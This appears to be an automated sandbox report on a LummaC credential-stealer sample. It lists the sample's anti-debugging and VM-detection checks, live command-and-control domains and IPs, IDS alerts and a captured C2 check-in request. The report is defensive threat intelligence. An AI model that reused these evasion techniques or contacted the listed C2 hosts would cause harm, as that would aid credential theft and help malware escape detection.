    Source: C:\Users\user\Desktop\file.exe TID: 6752Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 6772Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: file.exe, file.exe, 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: file.exe, 00000000.00000003.1732013708.0000000001249000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1734132839.0000000001249000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
    Source: file.exe, 00000000.00000002.1734132839.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: file.exe, 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098DF70 LdrInitializeThunk,0_2_0098DF70

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: p3ar11fter.sbs
    Source: file.exeString found in binary or memory: 3xp3cts1aim.sbs
    Source: file.exeString found in binary or memory: p10tgrace.sbs
    Source: file.exeString found in binary or memory: peepburry828.sbs
    Source: file.exeString found in binary or memory: processhol.sbs
    Source: file.exe, file.exe, 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: +Program Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping631
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive113
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information    		NTDS223
    System Information Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.TPM.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cook-rain.sbs/apiOn100%Avira URL Cloudmalware
    https://cook-rain.sbs:443/api-100%Avira URL Cloudmalware
    https://cook-rain.sbs/Q100%Avira URL Cloudmalware
    https://cook-rain.sbs/api%100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    cook-rain.sbs
    		104.21.66.38
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      p10tgrace.sbsfalse
        		high
        p3ar11fter.sbsfalse
          		high
          https://cook-rain.sbs/apifalse
            		high
            peepburry828.sbsfalse
              		high
              processhol.sbsfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://cook-rain.sbs/file.exe, 00000000.00000002.1734316733.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://cook-rain.sbs/api%file.exe, 00000000.00000002.1734132839.000000000129B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://cook-rain.sbs/apiOnfile.exe, 00000000.00000003.1732682281.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733073508.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1734316733.00000000012D4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://crl.microfile.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://cook-rain.sbs/Qfile.exe, 00000000.00000002.1734316733.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://cook-rain.sbs:443/api-file.exe, 00000000.00000002.1734132839.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.0000000001262000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.21.66.38
                    		cook-rain.sbsUnited States
                    		13335CLOUDFLARENETUSfalse

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1560426
                    Start date and time:2024-11-21 19:56:05 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 2m 36s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:1
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated

                    Warnings

                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    13:57:00API Interceptor2x Sleep call for process: file.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.21.66.38file.exeGet hashmaliciousLummaCBrowse
                      file.exeGet hashmaliciousLummaCBrowse
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          file.exeGet hashmaliciousLummaCBrowse
                            file.exeGet hashmaliciousLummaCBrowse
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                Loader.exeGet hashmaliciousLummaCBrowse
                                  file.exeGet hashmaliciousLummaCBrowse
                                    file.exeGet hashmaliciousLummaCBrowse
                                      file.exeGet hashmaliciousLummaCBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        cook-rain.sbsfile.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                        • 104.21.66.38
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        injector V2.4.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.155.248
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                        • 104.21.66.38
                                        Loader.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.155.248
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 188.114.97.3

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUSStatus Update DXLG.htmlGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        DHzscd9uqT.exeGet hashmaliciousSTRRATBrowse
                                        • 104.20.3.235
                                        http://bc1qcr8muz00d2v7uqg5ggulrmm.comGet hashmaliciousUnknownBrowse
                                        • 104.21.5.242
                                        https://www.google.com/url?sa=https://r20.rs6.net/tns.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/d7TO.ifvxdvrhe.ru%2FDflmD%2FGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        scam.htmlGet hashmaliciousUnknownBrowse
                                        • 172.67.200.84
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        https://bafkreifkijr4deqnzixvigwgbpmegtl7w7z65bwaf2xegf6wb5oejvy7je.ipfs.flk-ipfs.xyz/#mail@andrejsmanagement.com&c=E,1,7ZfSQ9vAYe7rvB9NwKAqcoBV6_2nCPL09QKb7jG3WYDaiZix9u1hiaulren8GlCVh8tr3ArY61yo0-gZFvLQqJ6pANsbQuIKnEW2EuUntXIIWBvyOuRTAdpQ&typo=1Get hashmaliciousUnknownBrowse
                                        • 1.1.1.1
                                        http://email.double.serviceautopilot.com/c/eJwczE2OrCAQAODTyA5ThfwUCxZv0_coqOJJom1HbZO5_SRzga8d-4ffP0MKRcKWQG0OMVjforMsga04XpR789LQSOkxO4pGC6YFiSjHbHTnsQ0pXnvtot1yXZL1Gthyr2SJckV2vXkQs5bMsUNk5LqACCFoapQqh4SYAzgzigPnEZEAMEKeQw-1xc5OKcWwwORBjm_ddL70fEZT_t7HZ2zHPbdjN1tZ7_szLf8m95rcq4nKOR69Zr0m96rje487ZnOWnd_8X8_Jwzq27RqiO7-Pc1__mKe43wAAAP__Gf5XhQGet hashmaliciousUnknownBrowse
                                        • 104.16.124.96
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                        • 104.21.66.38

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        SeleniumVBA.xlsmGet hashmaliciousUnknownBrowse
                                        • 104.21.66.38
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                        • 104.21.66.38
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        injector V2.4.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                        • 104.21.66.38
                                        u.xlsGet hashmaliciousBraodoBrowse
                                        • 104.21.66.38
                                        injector V2.4.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38
                                        injector V2.5.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.38

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        No created / dropped files found

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.9510044991696605
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:1'858'048 bytes
                                        MD5:6380b8ca2f9bfc1d86617a3a7fd924f1
                                        SHA1:04ff7e660a59bd2c45098e99a3fd5bff614d2d57
                                        SHA256:f7b7694decac18c856b37c68c8486eccd09470ec28c7f92d90f5f0905110eb7c
                                        SHA512:8b7d7728ac97e310b2b01ed34967a8eddb0663427d9d0be4ecdb6b1568194aa2edb1232daeced175d71e2dd7c6c453204b4f004ba8706ee4790473d86f9ab033
                                        SSDEEP:24576:Un1N/9/M73pKzpmVWfGQiljS+II1JOEQydhrBieETdpZwr4H4DfWtp+QpO68ihGo:U0K9mVWfG1ldB15DxkVhtp+BChOo
                                        TLSH:468533510F96F37CE1F760F89DED0D62B6727708F9098C3C2D24EA38D5169A70A25176
                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@.......................... J.....5.....@.................................\...p..

                                        File Icon

                                        Icon Hash:90cececece8e8eb0

                                        Static PE Info

                                        General

                                        Entrypoint:0x89f000
                                        Entrypoint Section:.taggant
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                        Entrypoint Preview

                                        Instruction
                                        jmp 00007FB4CCE521BAh
                                        pabsb mm0, qword ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        jmp 00007FB4CCE541B5h
                                        add byte ptr [eax+eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [edx], ecx
                                        add byte ptr [eax], al
                                        or ecx, dword ptr [edx]
                                        add byte ptr [eax], al
                                        add ecx, dword ptr [edx]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax+00000000h], eax
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        push es
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dh
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        0x10000x560000x262002cb0094ee1f447aa2d164d8e76f301d3False0.9994748975409836data7.987246249896705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x570000x2b00x20070f1a79bc3860113a0c2b5e611e88296False0.80078125data6.026796984354681IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        0x590000x2a90000x200140ef775e31cb728401f820822e38b85unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        nbqdyuoa0x3020000x19c0000x19ba0076458bfc600abd08d8ff9974f9334d34False0.9944721758275129data7.954937787050603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        lsjapkzb0x49e0000x10000x600eb60b14fc4651334b4bd715c9a0b9fb4False0.5904947916666666data5.024203837640284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .taggant0x49f0000x30000x2200efffe62ed3a7ccf77c2baf133841116dFalse0.06629136029411764DOS executable (COM)0.8085361294890754IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_MANIFEST0x49d5e80x256ASCII text, with CRLF line terminators0.5100334448160535

                                        Imports

                                        DLLImport
                                        kernel32.dlllstrcpy

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-11-21T19:56:59.191822+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.4543951.1.1.153UDP
                                        2024-11-21T19:57:01.063780+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449730104.21.66.38443TCP
                                        2024-11-21T19:57:01.063780+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.66.38443TCP
                                        2024-11-21T19:57:01.802442+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.66.38443TCP
                                        2024-11-21T19:57:01.802442+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.66.38443TCP
                                        2024-11-21T19:57:03.173261+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449731104.21.66.38443TCP
                                        2024-11-21T19:57:03.173261+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.66.38443TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2024 19:56:59.781342983 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:56:59.781393051 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:56:59.781474113 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:56:59.784647942 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:56:59.784665108 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.063669920 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.063780069 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.067483902 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.067497015 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.067892075 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.118263006 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.126914978 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.126956940 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.127177954 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.802469969 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.802596092 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.802659988 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.806107044 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.806126118 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.806147099 CET49730443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.806152105 CET44349730104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.868021011 CET49731443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.868118048 CET44349731104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:01.868199110 CET49731443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.868766069 CET49731443192.168.2.4104.21.66.38
                                        Nov 21, 2024 19:57:01.868798971 CET44349731104.21.66.38192.168.2.4
                                        Nov 21, 2024 19:57:03.173260927 CET49731443192.168.2.4104.21.66.38

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2024 19:56:59.191822052 CET5439553192.168.2.41.1.1.1
                                        Nov 21, 2024 19:56:59.775448084 CET53543951.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 21, 2024 19:56:59.191822052 CET192.168.2.41.1.1.10x6120Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 21, 2024 19:56:59.775448084 CET1.1.1.1192.168.2.40x6120No error (0)cook-rain.sbs104.21.66.38A (IP address)IN (0x0001)false
                                        Nov 21, 2024 19:56:59.775448084 CET1.1.1.1192.168.2.40x6120No error (0)cook-rain.sbs172.67.155.248A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • cook-rain.sbs

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449730104.21.66.384436408C:\Users\user\Desktop\file.exe
                                        TimestampBytes transferredDirectionData
                                        2024-11-21 18:57:01 UTC260OUTPOST /api HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                        Content-Length: 8
                                        Host: cook-rain.sbs
                                        2024-11-21 18:57:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                        Data Ascii: act=life
                                        2024-11-21 18:57:01 UTC999INHTTP/1.1 200 OK
